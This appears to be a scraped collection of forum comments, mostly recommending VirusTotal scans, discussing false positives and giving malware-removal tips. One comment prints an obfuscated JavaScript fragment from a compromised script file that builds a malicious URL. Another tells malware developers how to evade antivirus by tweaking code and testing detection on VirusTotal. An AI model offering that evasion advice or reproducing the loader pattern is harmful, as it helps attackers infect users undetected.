Another thing is whenever you download ANYTHING, not just pirated media, you should scan it first with an antivirus that you trust before you open or execute it. It's a good habit to put into practice so that you don't accidentally end up having to reformat your whole computer because you didn't bother. This includes stuff from Google, Microsoft, Mozilla, etc.
Also, http://www.virustotal.com/ is a very handy website for exactly this sort of thing.
Here's a better online virus scanner: http://www.virustotal.com/ (scans with about 20 up-to-date scanners, including Kaspersky)
Here's a DIY repair site to teach you how to repair everything: http://www.ifixit.com/
Here's a great Adobe After Effects tutorial site: http://www.videocopilot.net/tutorials/
Anyway, the list is fucking awesome!
Solved by using Hiren's BootCD: http://www.hirensbootcd.org/download/
Has a "BIOS Master Password Generator Collection of password generator tools to reset BIOS Power on Password / Admin password on Dell, Fujitsu Siemens, Compaq, Hewlett Packard, Phoenix and Samsung Laptops"
NOTE: I tried copying the exe file of the tool off the USB stick, but my AV promptly removed it, stating it is a trojan horse.
Virustotal result: http://www.virustotal.com/file-scan/report.html?id=7a12455f194d01ec2f73c64413596b8f2554bf2150f2183ae67b5e4b93db0e7b-1299320224
From what I gather, the executable is packed in a way that makes decompilation difficult; this particular packing sets off a large number of antivirus applications, including the one used at work. It is a false positive.
It's not that it is incomplete, it is outdated advice from 5 years ago.
Today you will get compromised just by trying to read your local newspaper that had malicious javascript embedded into ads (happened here. Twice.) If it's not your local newspaper it's the WSJ, or pandora, or any of the number of sites that let anyone embed whatever code they want in their pages as part of advertisements.
I've seen people get compromised by drive by java exploits after clicking on the top result from a google search. The idea that people are safe if they just don't download things is completely false.
Oh, and even reddit has had this problem
Here is the virus total link from that event. 5 out of 41 anti-virus programs detected it.
To provide some extra insight to the article, anything running in RAM tends not to be obfuscated, even if the executable itself is packed or even encrypted (generally and simplistically speaking).
A common trick in malware analysis is to image the memory of an infected host with mdd (AFAIK mdd is a little more widely known than the WinDD of the article), use something like Volatility to extract the suspect malware executable from the memory image, and then do static analysis on that executable.
This is particularly useful for those who think they might be infected, but the AntiVirus (or whatever tool) isn't reporting an infection: Do the above steps and simply submit the extracted executable to a service like VirusTotal. Often times, you'll see antivirus software hit on the extracted executable from RAM, but not the executable on disk.
A few do's and don'ts that I follow while downloading anything:
As someone has mentioned, the safest source usually is the program's website.
If you are downloading from some other site, look at the program size that is indicated on the page. Once the download is about to start, check whether the download size indicated matches with what was displayed on the original page and that the file name is not something else.
Once download completes, always run a virus check on the file with the AV that you are using. It's also a good idea to check it on http://www.virustotal.com.
If possible, run the installer on a Virtual Machine first.
During installation time, do not click on next buttons blindly but pay attention to what each page says. Uncheck the option to install any third party apps or crapware if the installer gives you that option.
Never ever download from a site that asks you to take a survey before allowing you to download.
Pay attention to the link that the download location points to. If it redirects to another domain, chances are that the link is not genuine.
Last but not least, always google for reviews of the product that you are about to download.
These are just a few steps I follow while downloading/installing any application. Not 100% foolproof, but takes care of majority of malware issues.
[Edited because I mixed up bbCode with Markdown and messed up the formatting the first time. AG]
Hello,
If you open an elevated Command Prompt (filename: CMD.EXE) and issue a "DIR C:\HSCML.EXE /S /P" command, does it find a file named HSCML.EXE anywhere on Drive C:?
If so, try uploading that file to VirusTotal for scanning by ~40 different anti-malware programs and let us know what is reported back.
Regards,
Aryeh Goretsky
Seems you are correct. Found the proof over on the minecraft forums.
Thanks
UPDATE: There is new information that there is a potential threat.
Updated Virus Total: http://www.virustotal.com/file-scan/report.html?id=a81e22e91c831bf3d60569b6a1d9b0e9bab283e20be819da8117dcbb731e07a2-1298314780
I received this from a buddy of mine:
> I have dug through the file and it is a downloader Trojan, now the plus side is it looks like it is only connecting to known virus sites so to stop the threat I suggest going and installing Spybot S&D -- http://www.safer-networking.org/en/download/
> Install and update this and then Immunize your system. This will blacklist all the downloader sites currently known, this blacklist does include the ones that the infected DLL file is trying to connect to.
> After that you can add an exception to your anti-virus and be in the clear. To be on the safe side I suggest you keep your Anti-Virus up to date, and I suggest using AVG since it has one of the best Resident Shields on the market for zero cost!
Tried it. No VirusTotal findings.
Proper interface. Does what it claims to do. And when you disable it, it automatically sets the clock based on a time server of your choosing.
Would download again :)
EDIT: I have to force-quit the program nearly half the time when it can't set the time using the chosen time-server. There seems to be no time-out in that function. But it's still a great tool. Use it while standing at your harvester outlet in single player! :D
It seems to be a virus from the future .. Are we role-playing Shin Megami Tensei? Can I be a Demon?
8/42 report viruses and they're all crappy AV. I think you need some better software.
Can you describe some characteristics of the infection?
Upload a sample to http://www.virustotal.com and paste the result.
Edit: Is this you? http://community.spiceworks.com/topic/158816-worm_downad-on-network
A comment from a user named acorn on the Krebs article:

> Searching the URL in Brian K's graphic shows detection eight months ago, and again 2 months ago:
> Sophos denotes it as Troj/Invo-Zip (trojan)
This looks really nice, a lot better than the other ones I've seen just for the simple fact it has the icons of the items. I shall be using this from now on! Thanks a lot :)
Virus scan for anyone who is suspicious: http://www.virustotal.com/file-scan/report.html?id=2da81d1370b9d9b7c5c371e9b793fab7a8f454957daa9c50c8a62ca9574992b6-1314960346
VirusTotal scan comes up pretty much clean... even McAfee.
A lot of AVs have poor heuristics and flag any executables that use a wrapper/packer (e.g. keygens, demos, trainers, etc.) even when they are perfectly harmless. Trainers also modify values in active memory, which may have triggered the warning. Then again... maybe it actually has a Trojan, but gamecopyworld is a pretty reliable source for cracked executables and trainers, so I doubt it.
My antivirus software didn't show a virus on that page.
Avira, BitDefender, G-Data, Malc0de Database, ParetoLogic, Phishtank, TrendMicro and Websense ThreatSeeker also show that it doesn't have a virus:
http://www.virustotal.com/url-scan/report.html?id=f82eb3988f4b6c91128bc1c6ad17f5bd-1307037263
Virus Check:
The file looks clean. Here's the Virustotal report: http://www.virustotal.com/file-scan/report.html?id=29a0833c27cf152d8ca9e3e2e85792fe35be36874c268dc43aa0e3955a1caf43-1300174249
--
Comment on the download process:
Rapidshare makes it difficult for the end user to download files. I suspect many people gave up before they ever started downloading the file.
--
Comment on the software:
Why do you need 7 different seed numbers? Why not just a single one?
Also, for large files you can just submit a checksum hash of the file into the search box, if the file has already been uploaded by someone else you'll get a report for the file instantly without having to upload anything.
On windows I use a shell extension to generate the file hash.
> So I was thinking "I'll just boot up Linux through virtual machine everytime I wanna use the web".
This is really not necessary. I mean, it'll work.. but it's overkill. As long as you have an ad-blocker running and you're careful and use common sense when you download files, you'll be fine.
If you're not absolutely certain about a file you're downloading, upload it on http://www.virustotal.com before you attempt to run it.
Various anti-virus and anti-malware companies allow you to submit suspicious files. You can find some places where you can submit via this search: https://www.google.com/search?q=submit+malware
You can't expect them to tell you how to fix your computer though. A submission will probably just cause their products to detect that malware in the future. They may also respond to you to tell you whether the file is malicious. It's best to do a full re-install using known-good sources.
A global hook isn't always bad. Various programs do legitimate things with it. However, if you have a program you can't identify doing global hooks, that is very suspicious.
First try scanning suspicious files via http://www.virustotal.com/. It automatically scans them using many different scanners. Even totally legitimate files can have false positives on a few though.
AVG's scan on virustotal didn't find anything:
Excuse the file name, compare it by the file checksums, it's the latest version of csgo.exe.
Virustotal says 14/16 online scanners report the website clean (+1 online scanner down, +1 online scanner not yet checked.)
I think it unlikely you've been infected; these kinds of sites seem to exist more to dovetail custom for collecting and selling drivers, manuals etc, which is useful - but it could easily not be.
Downloading stuff just because the battery is about to run out is not something to be encouraged -- don't tell n00bs that you did it and seemed to be okay.
Virustotal's result is a bit unsettling... If this is malware though, I have to give it to the developer. A game and a trojan all in 94kb!
It looks like a JSON encoding of comments, about 60K characters long. With out looking too deep, I'd call it a false positive related to links or other contents of some of the comments like the one reseph posted.
Contrary evidence? And more? And MORE?!
I shall take the risk... for science.
See how it stacks up against other AV. Get some research malware and see what it detects and does not detect. It can be pretty easy, not even requiring you to install all of the AV products. With VirusTotal, you can scan a file with multiple AV products. Keep in mind that this isn't definitive (versions, settings, heuristics, etc.), as the Panda results on the site did not match my testing with their enterprise product. I have dealt with SEP (Symantec Endpoint Protection), which seems ok but far from perfect, but from what I remember, Norton was bloated and worthless. Not sure what the consensus nowadays is.
Hello,
Have you tried locating the files on the computer's hard disk drive and then uploading them to a service like VirusTotal to see if they are malicious?
Regards,
Aryeh Goretsky
No address of the site owners or company, the company has no logo, no source code available, only a Windows binary, domain created 1 month ago. Not trustworthy at all!
but at least virus free...
Here's a list of virus scanners that detect the Windows Stability Center rogue antivirus.
A user would be in bigger trouble for having EICAR on their machine than an actual virus. EICAR typically isn't downloaded unintentionally, and usually means someone is testing your AV.
Just had the same problem.
Dug around and found the installer on their official GitHub page. Bear in mind for this crypto, the Ledger needs a stand-alone app, not a Chrome app. I have run it through VirusTotal and it yielded no virus threats. That and it's posted in Ledger's official GitHub account. That was enough trust for me, so I've installed it and had no issues transferring some out to it.
Anyone else verify if it's a trustworthy place? Someone who is using it for a while?
This is the Github page with downloads
Edit: I found a working solution (at least for me). Downgrading Uplay to 17.0.0.4674 according to this Steam post worked for me. http://steamcommunity.com/app/359550/discussions/0/412448792365217174/

> 1. Uninstall Uplay.
> 2. Download Uplay 17.0.0.4674 from http://www.filehorse.com/download-uplay/24573/ and install it (no worries, it is safe).
> 3. Open your Task Manager, start Uplay and kill it via Task Manager after the patch download has started (DON'T LET IT FINISH).
> 4. Now go to your "Ubisoft Game Launcher" folder -> cache -> patch.
> 5. Right-click on folder 4732 -> click "Properties".
> 6. Go to Security -> Edit.
> 7. For every user, make a hash under "Deny" for "Change".
>
> From now on you can start Uplay in online mode without it getting the update 17.1 Build 4732, because Uplay can't access the folder. When a new client update is released, it will be downloaded without problems.
I would advise you though to check the downloaded file with your antivirus app and http://www.virustotal.com
I played it a couple of years ago and it ran fine. IIRC the only problem I had was that I needed some mod to run it at my native 1920 resolution. The game doesn't appear to support newer higher resolutions past 1600 or so by default.
It was probably this one: http://blog.gib.me/2009/01/06/saints-row-2-resolution-editor/ (run it through http://www.virustotal.com/ just to be safe).
Guys, keep this in mind. Someone sends you a fishy link, or you just want to check websites/files for viruses?
I use VirusTotal and it works very well. Has detailed results and gets results from 40-50 different sites/programs.
Ok, uncheck the entry for chrome.exe as well under x11mod.
Also for good measure uncheck both TeamViewer service entries, then reboot.
Once you're logged back in, open http://www.virustotal.com and submit the chrome.exe and svchost.exe to it (you can get to this folder by right-clicking in Autoruns and selecting "Jump to Image"; be sure not to run these files! I highly suspect they're part of a Trojan. You can also click Options/Scan Options in Autoruns and select the bottom three checkboxes to automatically run VirusTotal scans within the app).
After that, I would grab http://www.malwarebytes.org and run a full scan (I think it'll find some remnants of unrelated malware called Conduit or SearchProtect), as well as http://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe to detect and remove any rootkits (click "Change Parameters" and check off the bottom three checkboxes).
Once you've removed anything detected with those (if any), let me know if you'd like help securing down your PC to prevent future compromise.
Sorry, I read that part and my brain must have stopped working just after. Anyways, here is a trick that might get you there (or any other site in case your browser is not working).
> mshta http://www.virustotal.com
EDIT: There is no address bar in mshta for you to copy the link from. No worries. Go to the "File Detail" tab in VirusTotal and copy the MD5, then paste it here and I'll paste the link for you.
All that said, you should post support topics in another subreddit, this one is for malware related articles/information, not for removal help.
Hello,
Given the random name, it is probably malware of some form.
Try right-clicking on the entry for it in the Task Manager, selecting 'Open File Location' to open the directory that it is in, and then uploading the file to Virus Total to receive a report on it from about four dozen different anti-malware programs.
Regards,
Aryeh Goretsky
http://windows.microsoft.com/en-us/windows/security-essentials-download
Windows 8 has them built-in, and this is the standard recommendation for W7.
There are other free solutions available, though, for example Avira:
http://www.avira.com/en/avira-free-antivirus
I use MSE (W8). If I have a special case that I want to know about, I send it to http://www.virustotal.com (40+ scanners)
If you download a binary (suitable for your system), you can run it right away (or install and then run).
If you download source code, you could theoretically compile it to a binary and run it, or run it in the IDE where you compile it. But compiling source is usually an endeavour with obstacles.
Another difference: If you run compiled source code, you - theoretically - know exactly what you're running there. Running a downloaded binary could do stuff that you don't want; see e.g. all the three-letter-agency backdoors we have these days, but those are usually even in the source code, they are just well hidden. This is all very theoretical. The rule to go for normal users is: Download the binary for your system. If you don't trust it because of viruses, check it on http://www.virustotal.com, but in most cases you're fine. If the download location was proper, I mean. Don't expect a shady application that only like 10,000 people on the Web download to be definitely pure.
Hello,
Try uploading the PDF file to a multi-scan engine like Google's VirusTotal, which will scan it with a battery of several dozen anti-malware programs.
Regards,
Aryeh Goretsky
Yeah, it'd probably throw up a lot of red flags as well if you ran it through a multi-antivirus and file analyzer like VirusTotal. I haven't done so myself because I'm paranoid I'll somehow launch the file by mistake.
I think it's cool to see the community coming together to protect people from a common threat. Thanks for being a part of that. :)
There are thousands of ways to get infected, most of which can be avoided with common sense. If someone sends you www.battlefield.freehost1.com/game.exe and tells you it's a crack for battlefield there is a very good chance it's not.
If someone tells you they have some kind of software that does something that seems unbelievable such as a paypal cash generator or xbox live points hacker and they try to send it to you tell them to fuck themselves (or don't attempt to hack them back)
Oh I forgot GUYS IF YOU EVER GET SENT OR FIND A SUSS FILE SCAN IT HERE: http://www.novirusthanks.org/service/multi-engine-antivirus-scanner/
OR
Thanks! Virustotal reports it clean. http://www.virustotal.com/file-scan/report.html?id=bc1a96c76f7dcfa73325a7a4b3024b4c636dd58598d91d92f4c737f8d2117999-1313959358
Good point
I'm on the 1994 San Marino GP (http://www.classicgrandprixclub.com/Grand-Prix/03-San-Marino-gp-1994) but there isn't anything there except 5 "download" and "play" adverts that try to get me to download XVid codecs that are full of malware
Does it show your address or last few digits of a card?
All the ones I have seen similar to this have been frauds trying to get you to download a trojan or similar (in this case zip file contains invoice.exe and putting in the URL into http://www.virustotal.com says Malware site on a couple of checkers)
How do I know they couldn't be genuine? They never come to an email address they could have linked to my card details.
I'd say they have harvested your name and email address from some site and just sent a spam
It does contain opencandy adware, but only MSE and NOD32 consider opencandy a threat.
If you scroll to the bottom of the EULA, they state it plainly:

> OPENCANDY
> OpenCandy End User License Agreement
> January 26, 2010
> This installer uses the OpenCandy network to recommend other software you may find valuable during the installation of this software. OpenCandy collects NON-personally identifiable information about this installation and the recommendation process. Collection of this information ONLY occurs during this installation and the recommendation process; in accordance with OpenCandy's Privacy Policy, available at www.opencandy.com/privacy-policy
Downvoted, reported, called the cops, hit the gym.
Edit: Oh, and it's a virus.
Another person thinks this is malware:
https://bitcointalk.org/index.php?topic=36218.msg446375#msg446375
Also:
Edit1: Two guys on the bitcointalk.org forum skimmed through the source code and say there are very few changes and that they found nothing malicious about it. So at least it doesn't seem to try to steal your wallet or install malware. Probably just an attempt from one individual to be a very early adopter. He started mining quite a bit before announcing this fork.
awesome. So this file's been uploaded before, I imagine that happens a lot... and this is the result:
2 guys out of 19 say it's malware. So I'm still to assume it's probably safe, I guess...
Could be a false positive. VirusTotal seems really generic with everything.
https://rapidshare.com/files/1491257191/Battlefield_Heroes_Beta__550k_users_.rar is the URL I've been pointed to.
It's a list of username / hashes as a CSV with 548774 lines.
Edit: and as it's a RAR, here's what VirusTotal says
Quite possibly. What is the block of code at the end of http://www.focuspointstudios.com/ads/swfobject.js , starting with "this.l=18257;this.l--;this.p=43988"? It does not seem to be a part of swfobject.js version 1.4.4. VirusTotal certainly doesn't like it.
Edit: It has shit like this in it, constructing URLs from pieces and substrings var a = String("5I6Whttp".substr(4) + "://aN70".substr(0, 4) + "shdo" + "g.ru" + ":"); this.Fj = ""; var Z = 500385 - 492305; var Fc = ["LJ", "jN", "tV"]; var _H = "/gbRp".substr(0, 2) + "oo" + "gl" + "e." + "TeZco".substr(3) + "m/" + "fi" + "sh" + "ki" + ".nu2q".substr(0, 2) + "et" + "fOBX/p".substr(4) + "eokJBy".substr(0, 2) + "PALrplrLAP".substr(4, 2) + "e." + "co" + "m." + "cnO1l".substr(0, 2) + ".pAXJ".substr(0, 2) + "vUuhp".substr(3);
What antivirus are you using? I can't get a single red flag from any of them.
DVORAK! Then your Z key won't work (if you stayed on Dvorak). I use a program called Dvorak Assistant; you can double-click the tray icon to swap back and forth between keyboard layouts. If you don't trust the program, upload it to VirusTotal for a scan to prove it's safe :)
(The ?/ key in Dvorak is where the [{ key is on QWERTY.)
Looks good just downloaded about to go play with it because I want to build a city. Anyways for anyone interested VirusTotal Report here tl;dr Perfectly clean
All current Anti Virus software leaves you unprotected...
Something like 40 different Virus scanning engines. Any time I get a hit from my daily virus scan, I use virus total to check to see if it looks like a false positive.
Also, I haven't had a chance to check it out much, but academicearth.org looks promising.
There are a few. Most antivirus company sites have this.
And check this one that you can also submit a download link to be checked before downloading. http://www.virustotal.com
I think a good piece of advice would be for people to avoid visiting AQ related websites. With that said.. it doesn't appear the file from 2009 they're referencing is at all malicious. No AV hits (years later) and additional analysis indicate it's just a regular document.
Wow, that's trust. After 13 hours, no one has sent this thing to VirusTotal.com yet.
Results: None. (As expected.)
This might be interesting then: http://www.clamwin.com/
And you could disable the "active protection" features of both AVs I mentioned.
If you really want to manually scan files, I can advise http://www.virustotal.com
If you have a URL, you can enter that URL into VirusTotal and it will scan the content for you - but be aware that whatever is retrieved/found will be shared with various other orgs, so do not use it for private/confidential data.
>Of course I click block.
Have you ever heard of a tech guy ask "Operator error?"
Norton is not a software I would recommend to any person for any reason, for any computer. It's just... no. In fact, I'm one of the few Windows users who refuses to put any antivirus on the laptop. One day I decided to stop buying into the hype that my computer would get overrun with viruses if I didn't have the antivirus.
Most interesting out of that experiment is the number of malware programs that STOPPED showing up on my computer after removing MalwareBytes!
But then, I'm also careful about the things I put on and use VirusTotal to help show whether or not the software has malware in it.
It is highly possible that your issues of Norton + Mac are causing problems. Did you do a review to see how well other people have usage experience of Norton on their Mac? Did you do a review of this type of problem happening outside of having antivirus on a Mac?
These are the first couple questions that come to mind when seeing Norton software on any computer.
Check this out, it will guide you through the process,
Regarding your query, you must have landed on an advertisement site which your browser flagged.
You can always test the apks on www.virustotal.com for any virus/malware/adware.
Also I can assure you that all the mods are tested on Virus Total before uploading.
If you still have any query contact us at Our official group
Thank you!
If Malwarebytes has quarantined it, you should be fine. If you are still worried, make sure to check what launches on startup (Settings > Apps > Startup) and make sure the app isn't there.
You hit "No" when asked if it could make changes, so if it was a virus, it couldn't do much.
If you want, you can use Virus Total to search websites/files to check for viruses/phishing attacks/malware
Before you install risky APKs, scan them with VirusTotal (http://www.virustotal.com). It will inform you about malware (viruses, trojans, worms) and allows you to upload any unknown applications to VirusTotal. In other words, it will get your applications scanned by more than 50 antivirus programs, flagging any undesired content.
You've caught my attention. What kind of file? Can you upload the file to http://www.virustotal.com and post the results as a reply?
You can also use some of the SysInternal Suite Tools
It's really recommended, although your advice is good. Most of the scripts from Aveyo are very, very interesting, and if any of them were loaded with any malware or suspicious activity, Pastebin would have closed his account a long time ago.
Also, if it's any good, Virustotal upload of the script.
Upload the clientrunner.exe to Virustotal.com and check the results. If the vast majority of reports say it's clean, it's most likely clean.
One or two false positives don't mean much, as others have already told you.
If I'm correct, the file is only 9,4MB. Simply go to http://www.virustotal.com, upload it and have it scanned by 30 odd different anti-virus programs. Depending on the outcome, make an informed decision.
I don't know F-Secure and have never used it. I think it's just stating that it has not often encountered this file and thus doesn't have much info on it. Being cautious is great, being paranoid is not!
Also check the MD5 checksum.
Nope, you can use a mod for it though. Alternatively, there are a ton of good trainers/cheat tables out there for D1, and they're very easy to use/find. It's a single-player game, so I'm assuming the encouraging of cheating is allowed.
I would use virus total if you do decide to download any trainers/mod menus, can't detect everything but it can detect a lot.
Hello,
Try uploading the file to VirusTotal, a multi-engine scanning service run by Google.
If any of the anti-malware programs there detect it, use one of them to remove it from your system.
Regards,
Aryeh Goretsky
My workflow is this one:
If you can locate the infected file, run it through VirusTotal - you'll get results from dozens of antivirus companies and you'll be able to determine if it's a false positive.
In addition, look up the file name and how it relates to Google Drive - maybe it was planted there and should be removed. Same regarding the hidden folder (unless you created it yourself)
Edit: link format
First, keep OS and apps updated.
If you must use Flash, use some way to turn it off by default and only turn it on at some sites where you need it. Firefox has this built in.
Don't keep any other browser plugins needlessly enabled.
Think before running anything you download. Using some good anti-virus and anti-malware software helps, but cannot serve as a replacement for the user's brain. If you're suspicious about something, you can submit it to http://www.virustotal.com/ which scans it with lots of different scanners, but even that is not a guarantee.
Hello,
You might want to archive the file (.7Z, .RAR, .ZIP, etc.) and upload it to Google's VirusTotal multi-scanning engine to see what it reports, if anything.
Regards,
Aryeh Goretsky
This has been the issue as long as I can remember; since 1.6 it has never been improved. All the 3rd party tools have VIRUSES, like this one: http://csgo-demos-manager.com/
scan it on http://www.virustotal.com if you don't believe me
The latter. Do you honestly think that files which contain code to alter your gameplay are impossible to hold a virus because of their size? The smallest known viruses are just several bytes long. Bytes. That's without a k.
virustotal.com is a well-respected website for file checking, using over fifty known anti-virus applications, not just "your average virus scanner".
Eh - this would be more useful if you already had the hashes. You can grab some Poison Ivy hashes from this writeup - the writeup might be informative for the students as well.
https://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf
If Malwarebytes "said" it removed the trojan, then the trojan got removed from your computer :) You should always scan the cache folder with Malwarebytes after you download software from torrents, you should also submit all downloaded .exe and .zip and .rar files to http://www.virustotal.com/ (it scans the files with 60+ Antivirus software)
You made some good points and questions. I can only share my experience and tips about using VPNs and torrents, the safe way:
1) use Google Public DNS (to override your ISP DNSs and to not be spied on by your ISP)
2) use a VPN like TorGuard that allows torrents http://www.unbloock.com/torrent-p2p-vpn/
3) use a safe torrent client, like uTorrent http://www.majorgeeks.com/files/details/utorrent.html
4) if you download applications or software, always scan them with http://www.virustotal.com/
5) download torrent files from trusted sites.
Hope you have found the information useful.
Hello,
Try uploading the file to VirusTotal which is a free service operated by Google. It will then run a battery of anti-malware programs against it and let you know the results.
Also, give your anti-malware vendor's technical support department a call, explain what happened and ask them to walk you through checking the computer for new, undetected malware.
Regards,
Aryeh Goretsky
Statistically speaking, sites like Pornhub and RedTube are safer than your average site simply because they have to be. It's the ads on the side that are dangerous.
As for TPB, just use VirusTotal.
> n
Hey pal, should be a false alarm.
I use Qihoo 360 IS and get false alarms with Prison Architect, sometimes TF2. I think the companies (AVs) are sometimes not as fast as they should be.
You could upload the exe to virustotal.com.
The good viruses aren't going to show any effects on screen. The bad ones will just show toolbars and browser hijackers.
Check out VirusTotal, Anubis, and Malwr. The latter shows some screenshots of the virus as it runs in a VM.
Alternately, you could just fire up your own VM, snapshot it, and then start downloading viruses and malware.
For any file under 128MB, you can run it in VirusTotal (http://www.virustotal.com). Once you download the file, open the folder location (before you open the file itself), and then drag it directly to VirusTotal (or browse for the file). It'll use like over 50 different anti-virus systems to check the file for a virus. Also, if the file has been scanned already (by other downloaders), it'll show you the previous scan results. Usually, music albums and movies will be too big to scan, so I mean in that case honestly I would go by the torrent's history... (and having a good anti-virus program)... but many programs and applications that I download, for example, are less than 128MB, and VirusTotal is a gem for double checking them!
I use Virus Total as much as possible, it's pretty comforting in situations that you feel rather eerie about.
Also, building on what others said, download from "verified" torrent uploaders... on Pirate Bay they'll have a colored skull icon next to their name. If it's green, they have "VIP" status, pink means they're "trusted," and blue means "helper." (There's some info about it here: https://forum.suprbay.org/Thread-ThePirateBay-Want-Trusted-VIP-Status-Pink-Green-Skull-See-Here -- couldn't find much else, but I'm sure you can look it up more extensively if you need to.)
On Kickass, a verified uploader is someone who has a crown next to their name. Reading comments helps, as well. If you ever see a torrent that has many good comments and just a couple of bad ones, I would recommend checking out the user history of the bad commenters; sometimes it's spam or just people being jerkoffs.
A portable EXE might write to the registry, that is somewhat normal. (A true portable app leaves no traces behind or entries in the registry.)
You might try uploading the EXE to http://www.virustotal.com/
Of course providing info on the EXE also might help us help you.
A wiser person wouldn't run a mysterious EXE to "see what it was."
Hello,
You could upload the various files you suspect to various websites like [VirusTotal](http://www.virustotal.com/), Metascan and Anubis and post the links.
You might also want to consider putting an archive of the files up for people to download, whether it be from Reddit or your anti-malware vendor's technical support department.
There are a lot of different anti-malware programs out there which detect all sorts of threats, possibly including whatever might be affecting your computer. Some of them are free for individual use (Avast!, AVG, Avira, ClamWin, Comodo, Immunet, Microsoft, Panda, Qihoo 360, etc.) while others must be licensed (BitDefender, ESET, F-Secure, G-Data, K7, Kaspersky, McAfee, Sophos, Symantec, Trend Micro, Vipre, etc.). However, even the paid ones typically offer evaluation versions for a month or so, and that includes tech support as well. So, pick a vendor, install their software, see what it finds, and call their tech support and go from there.
Regards,
Aryeh Goretsky
If you're a good malware developer, make your own. If you're not, download one from a trusted source and twist the code so that it does the same but the checksum is different. Just changing a couple of letters will hide it from various AVs, but the more you twist it the more AVs you will bypass.
Check the file with a service like virustotal to see which AVs you can bypass and which ones you can't.
There are a lot of detection methods used by AVs, and therefore there are also lots of bypassing methods used by malware developers. It's hard to make a resume of the different ways of doing it :/ Sorry!
>I got one hit from TDSSKiller. It was /Device/Harddisk0/DR0. Can anyone explain what that is?
Could be a rootkit, could be absolutely nothing. You'll have to dump your MBR manually using the standalone MBR.exe file from GMER. http://www.gmer.net/
Download and extract it. Then type the following in to a command prompt.
mbr -c 0 1 mbr.bin
Then upload that mbr.bin file to http://www.virustotal.com for checking.
>When I run RKill, it kills a process called rundll32.exe in my SysWoW folder. Is this bad? If so, how do I get rid of it?
Yeah, that's bad. It should NOT be in that folder.
What was the result of the Combofix run after running rkill? Did it finish? Did it give you a log file?
You probably have the Bamital.Q Trojan. If you were to upload your winlogon.exe and Explorer.exe to VirusTotal, you may also find that they are infected. If this is the case, your best bet on removing it is to use Microsoft Safety Scanner. Run a full scan on your C:\ drive, reboot, and then run Malwarebytes' Anti-Malware with a full scan on your C:\ drive. After that you should be all set without having to reformat.
What warning did you get?
VirusTotal gave it a clean bill of health:
Man I clicked on that .gif way before I saw this thread. Nothing happened to me. I just can't believe it came from that image. I downloaded the image and ran it through http://www.virustotal.com and nothing popped up.
Maybe you had a virus/root kit just waiting for you to hit ESC.
Just because someone cries wolf doesn't mean there is one.
The following all rate your site as clean:
Avira Clean site
BitDefender Clean site
Firefox Clean site
G-Data Clean site
Google Safebrowsing Clean site
MalwareDomainList Clean site
Opera Clean site
ParetoLogic Clean site
Phishtank Clean site
TrendMicro Clean site
Websense ThreatSeeker Clean site
Wepawet Clean site
(From VirusTotal.com).
It's safe. Don't just take my word for it though, you can download it and check it up on an online virus scanner. Go to the link below to look at the results when I scanned it.
Stop overreacting, bro/girl. It's probably because your media player doesn't know how to handle foreign file names and it hasn't released control over the file, hence the difficulty deleting it.
Either way, look at this. Boom, QED.
Downloading a rar file will not hurt your system. Just remember to open the file in your virtual machine or your test machine if you find it suspicious. Or use this to scan the file online.
Avoiding a virus is common sense, you don't need an anti-virus program.
~~Note~~ *I tried to make this short and simple. I loathe anti-viruses (I keep my firewall on and update my stuff, so I don't get hit by real hackers). I didn't talk about a lot of other stuff, I know.*
What file was it? That information would greatly increase the chances of figuring out what it is. If you still have the file, send it through VirusTotal.com and it should tell you what is in the file.